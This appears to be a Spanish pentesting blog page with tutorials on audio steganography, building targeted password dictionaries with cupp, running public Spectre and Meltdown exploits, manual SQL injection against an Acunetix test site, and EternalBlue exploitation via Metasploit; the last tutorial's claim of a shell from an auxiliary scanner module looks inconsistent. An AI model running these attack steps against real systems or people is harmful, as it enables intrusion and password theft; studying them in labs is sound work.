Pentesting ,Hacking y Seguridad informatica

Esteganografía: Ocultando información en archivos de audio

Como si de una serie de ciencia ficción se tratase, es posible ocultar información en pistas de audio para pasar desapercibido dicho contenido en lo personal encuentro muy útil esta técnica de esteganografia porque ademas de añadir una capa de seguridad adicional a la información que buscamos proteger también nos conecta con algo tan característico y personal que resulta bastante sencillo de recordar.

ocultar-archivos-en-audio

sin mas preámbulos vamos a la parte interesante de todo esto, recuerda que nuestro objetivo siempre sera preservar la integridad de la información.

Fase 1: Preparando nuestro entorno

 

1 – Vamos a descargar “DeepSound” de la pagina oficial del siguiente LINK

ocultar-archivos-en-audio

2 – Buscamos en las descargas nuestro archivo DeepSoundSetup.msi 

ocultar-archivos-en-audio

3 – Abrimos en la carpeta de descargas y ejecutamos el DeepSoundSetup.msiocultar-archivos-en-audio

4 –  Ahora tenemos que proceder con la instalación del software , damos click en next

ocultar-archivos-en-audio

5 – Aceptamos los términos de la licencia de uso y le damos click en Next.

ocultar-archivos-en-audio

6 –  La ruta de instalación por defecto sera en la carpeta de Program Files y damos click en Next

ocultar-archivos-en-audio

7 – Procedemos con la instalación de la herramienta , damos click en Install el cual se ejecutara con privilegios de administrador.

ocultar-archivos-en-audio

8 – Una vez finalizada la instalación damos por cerrado la adecuación de la herramienta.

ocultar-archivos-en-audio

Fase 2: Encriptar los documentos

 

1 – Identificamos el archivo que queremos proteger, en este caso yo voy a encriptar el documento “confidencial.txt”

ocultar-archivos-en-audio

2 –  Abrimos nuestro DeepSound instalado en la fase 1 del tutorial

ocultar-archivos-en-audio

4 – Damos click en la opción de “Open carrier files” y buscamos nuestra canción favorita.

ocultar-archivos-en-audio

5 –  Para este ejemplo voy a utilizar Kalimba como contenedor de nuestra información.

ocultar-archivos-en-audio

6 – Ahora damos click en “Add secret files” y buscamos nuestro documento, en este caso “Confidencial.txt”

ocultar-archivos-en-audio

7 –  Después de tener un contenedor y un documento que ocultar procedemos a dar click en “Encode secret files”ocultar-archivos-en-audio

8 – Le ponemos una contraseña para obtener nuestra información posteriormente, nuestra ruta por defecto sera en el escritorio.

ocultar-archivos-en-audio

9 –  Listo!! tenemos nuestra información encriptada en nuestra canción Kalimba, nadie sospecharía de esto.

ocultar-archivos-en-audio

Fase 3: Desencriptar los documentos

 

1 – Abrimos nuevamente nuestro DeepSound, damos click en la opción “Open carrier files” y seleccionamos el audio con la información, podemos ver que su tamaño aumento.ocultar-archivos-en-audio

2 – Ingresamos la contraseña para poder acceder a los documentos

ocultar-archivos-en-audio

3 –  Si la contraseña se ingresa correctamente podemos acceder a nuestro documento contenido, posterior a esto damos click en “Extract secret files”

ocultar-archivos-en-audio

4 – Perfecto! ahora podemos acceder a nuestro documento en el escritorio!

ocultar-archivos-en-audio

Interesante herramienta, ahora solo te queda pensar en los múltiples usos que le puedes dar a la esteganografia y empezar a proteger tu información!

Saludos!

0x00Sector!!

 

Diccionarios personalizados para ataques de fuerza bruta

brute force attack

Preparando nuestro diccionario personalizado para ataques de fuerza bruta

Si bien existe una gran variedad  de obtener acceso a aplicaciones,redes y/o plataformas restringidas una de las mas comunes es aprovecharnos de los descuidos de los administradores,responsables y programadores de dicho sistema, muy seguramente te encontraras en redes WiFi donde la contraseña se compone de cierto tipo de palabras y números relacionados con la compañía, en este caso vamos a generar nuestro propio directorio para ataques de fuerza bruta que permita que las posibilidades de éxito se incrementen de manera exponencial, Empecemos!!

1 – En esta ocasion vamos ver una herramienta que en lo personal me ayuda bastante cuando se realiza alguna auditoria sobre una plataforma que podamos generar un ataque de fuerza bruta, primero descargamos cupp

git clone https://github.com/Mebus/cupp

brute force attack

2 – Ingresamos a el directorio cupp

cd cupp
ls

brute force attack

 

3 – Ahora ejecutamos el código de “cupp” donde podemos identificar las opciones disponibles.

python cupp.py

brute force attack

4 –  Vamos a utilizar el método interactivo para generar nuestro diccionario personalizado.

python cupp.py -i

brute force attack

En este ejercicio vamos a utilizar datos falsos generados por una herramienta diseñada para este tipo de situaciones.

brute force attack

5 –  Diligenciamos datos básicos como nombres, fecha de nacimiento y usuario.

brute force attack

6 –  Muchas personas optan por utilizar contraseñas que estén relacionadas con temas que le sean familiares.

brute force attack

7 –  Incluimos el nombre de la mascota y en este caso el nombre de la compañía para la que trabaja.

brute force attack

8 –  Adicional podemos configurar palabras claves sobre el comportamiento que podamos identificar en el individuo sobre temas de interés.

brute force attack

9 – En unos pocos minutos podemos tener un poderoso directorio para proceder a ejecutar nuestro ataque de fuerza bruta!

brute force attack

Recuerda que la posibilidad de éxito de este tipo de ataques no esta totalmente garantizada y dependerá directamente de las nociones que tu objetivo tenga sobre el uso de contraseñas robustas, igualmente por experiencia propia me funciono muy bien esta herramienta para objetivos con un bajo conocimiento técnico.

Saludos!

0x00Sector!!

Explotando vulnerabilidades Meltdown y Spectre

El mundo tiembla ante Meltdown y Spectre

Meltdown y Spectre son dos vulnerabilidades criticas que fueron encontradas recientemente, permitiendo a los hackers robar información sensible, una de estas vulnerabilidades afecta a procesadores fabricados desde hace mas de 23 años.

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Sistemas afectados:

Hardware de CPU

Que son Meltdown y Spectre:

Meltdown es una falla de seguridad que permite a los hackers eludir la barrera de hardware entre las aplicaciones ejecutadas por los usuarios y la memoria del núcleo de la computadora.

Spectre es ligeramente diferente. Potencialmente, permite a los piratas informáticos engañar a las aplicaciones que de otro modo estarían libres de errores para obtener información secreta.

Explotación

Esta prueba de explotación se realiza con un fin educativo y se realiza bajo el siguiente procesador.

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Spectre (CVE-2017–5753 ,CVE-2017–5715)

1 – Descargamos el repositorio desde https://github.com/MangelZabala/Spectre

git clone https://github.com/MangelZabala/Spectre
cd Spectre/
ls

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

 

2 – Compilas el programa C con el siguiente comando:

gcc -std=c99 spectre.c

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

3 – Ahora ejecutamos la salida “a.out”

./a.out

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

PoC Fuentehttps://spectreattack.com/spectre.pdf

 

Meltdown (CVE-2017-5754)

 

1 – Descargamos el repositorio en github

git clone https://github.com/paboldin/meltdown-exploit
cd meltdown-exploit
ls

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

2 – Compilamos el exploit con el comando “make”

make

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

3 – ahora ejecutamos el .sh

sh run.sh

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Espero les sirva la información y la utilicen sabiamente, estas vulnerabilidades aun están en desarrollo y sus variantes pueden cambiar por lo tanto no existe una solución definitiva a los procesadores que tienen este fallo de seguridad, su recomendación es cambiar de CPU..( ͡° ͜ʖ ͡°) .

Saludos

0x00Sector!

 

 

Explotando una pagina vulnerable a SQL Injection

Explotando de manera practica una pagina vulnerable a SQL Injection manualmente

Inyección SQL

La famosa vulnerabilidad de SQL Injection nos permite inyectar consultas para acceder a información restringida y se produce cuando no se validan correctamente las entradas en el desarrollo de las aplicaciones como consecuencia podemos obtener información muy interesante. vamos a ver como identificarlo y como explotar esta vulnerabilidad, para ello vamos a utilizar el laboratorio web de acunetix que nos permite ver de una manera mas clara este tipo de Vulnerabilidades, manos a la obra!

Paso a Paso

1 – En este escenario vamos a practicar con la pagina testphp.vulnweb.com que es especificamente diseñada para entender este tipo de vulnerabilidades, en la imagen podemos observar su panel principal.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

2 – Ingresamos a el apartado de “Browse Categories” donde podemos observar el siguiente menu de Posters,Paintings,Stickers y Graffity.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

3 –  Ingresamos a la categoría de “Posters” , aparentemente  una interesante galería de imágenes con su correspondiente artista…podemos ver un identificador en el URL lo que puede estar haciendo una consulta a “algo”.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

4 – Nuestros instintos de Hacker se despiertan y comprobamos poniendo un simple ” ‘ ” a el final de la sentencia para poder detectar rápidamente que el sitio es vulnerable a SQL Injection!, en este caso podemos ver que nos indica la pagina tiene un error en la sintaxis.ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

5 –  Empezamos con un simple Union para poder inyectarle nuestra propia sentencia, nuestro objetivo es lograr encontrar la cantidad de columnas que tiene la sentencia ya dispuesta en la pagina para poder ejecutar la nuestra.ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

6 –  Lo logramos, encontramos que las columnas contenidas en la sentencia equivalen a 11.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

7 –  Utilizamos “@@version” con este comando podemos ver la versión del motor de base de datos alojado en esta web.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

8 – Ahora utilizamos “user()” para identificar el usuario con el cual se ejecutara la consulta, en este caso podemos ver que nos retorna acurat@localhost.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

9 – Ahora nos ponemos serios y recopilamos información interesante, buscamos el nombre de las tablas , encontramos algo interesante.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

10 – Encontramos Oro! columna uname y pass esto quiere decir que podremos tener un posible acceso a el portal.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

11 – Utilizamos un concat para poder ver claramente los valores de las columnas encontradas anteriormente desde la tabla users.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

Espero les sirva la información y en caso de tener inconvenientes con algunos de estos pasos no dudes en preguntarlo.

Saludos!

0x00Sector!

Explotar Vulnerabilidad EternalBlue con Metasploit

Detectar vulnerabilidad MS17-010 EternalBlue y explotarla.

En el mes de mayo del año 2017 se detecto un Rasomware llamado WannaCry, este malware se aprovechaba de la vulnerabilidad EternalBlue para propagarse por las redes conectadas a los equipos relacionados a nivel interno, la causa de su gran impacto se debe principalmente a la existencia de esa brecha en todos los dispositivos windows y el parche no fue liberado horas después de identificar la vulnerabilidad, hoy vamos a detectar si un equipo es vulnerable y demostrar lo sencillo que es aprovecharse de esta vulnerabilidad.

1 – Procedemos a dirigirnos a la ruta donde Nmap almacena los scripts para posteriormente descargar el .nse liberado para detectar la existencia de esta vulnerabilidad.

Url Fuente: https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse

cd /usr/share/nmap/scripts && wget https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse

Explotar Vulnerabilidad EternalBlue con Metasploit

2 – Ejecutamos el Nmap invocando a el script para detectar si el objetivo en cuestión es vulnerable o no.

nmap -p445 --script smb-vuln-ms17-010 <IP>

3 – Ahora que sabemos que nuestro objetivo es vulnerable procedemos a ejecutar nuestro Metasploit para ejecutar el ataque.

msfconsole

Explotar Vulnerabilidad EternalBlue con Metasploit

4 – Buscamos el exploit de la librería de Metaspploit.

search ms17_010

Explotar Vulnerabilidad EternalBlue con Metasploit

5 – Seleccionamos el exploit a utilizar y adicional revisamos su opciones de configuración.

use auxiliary/scanner/smb/smb_ms17_010 
options

Explotar Vulnerabilidad EternalBlue con Metasploit

6 – En este caso especifico solo vamos a modificar la opción RHOST y procederemos con la explotación.

set RHOST <IP>

Explotar Vulnerabilidad EternalBlue con Metasploit

7 – Después de tener nuestras opciones definidas y todo en orden procedemos con la explotación!.

exploit

Explotar Vulnerabilidad EternalBlue con Metasploit

Explotar Vulnerabilidad EternalBlue con Metasploit

8 – Podemos ver que la explotación se realizo de manera correcta y pudimos obtener una shell en el equipo remoto pudiendo comprometer la totalidad del equipo

Explotar Vulnerabilidad EternalBlue con Metasploit

De esta manera podemos identificar el alcance que puede tener este ataque y parte de las consecuencias, la solución es tan sencilla como aplicar el parche liberado por Microsoft para cerrar esta vulnerabilidad, recuerda utilizar esta información de manera responsable, Happy Hacking.

Saludos!Social

0x00Sector!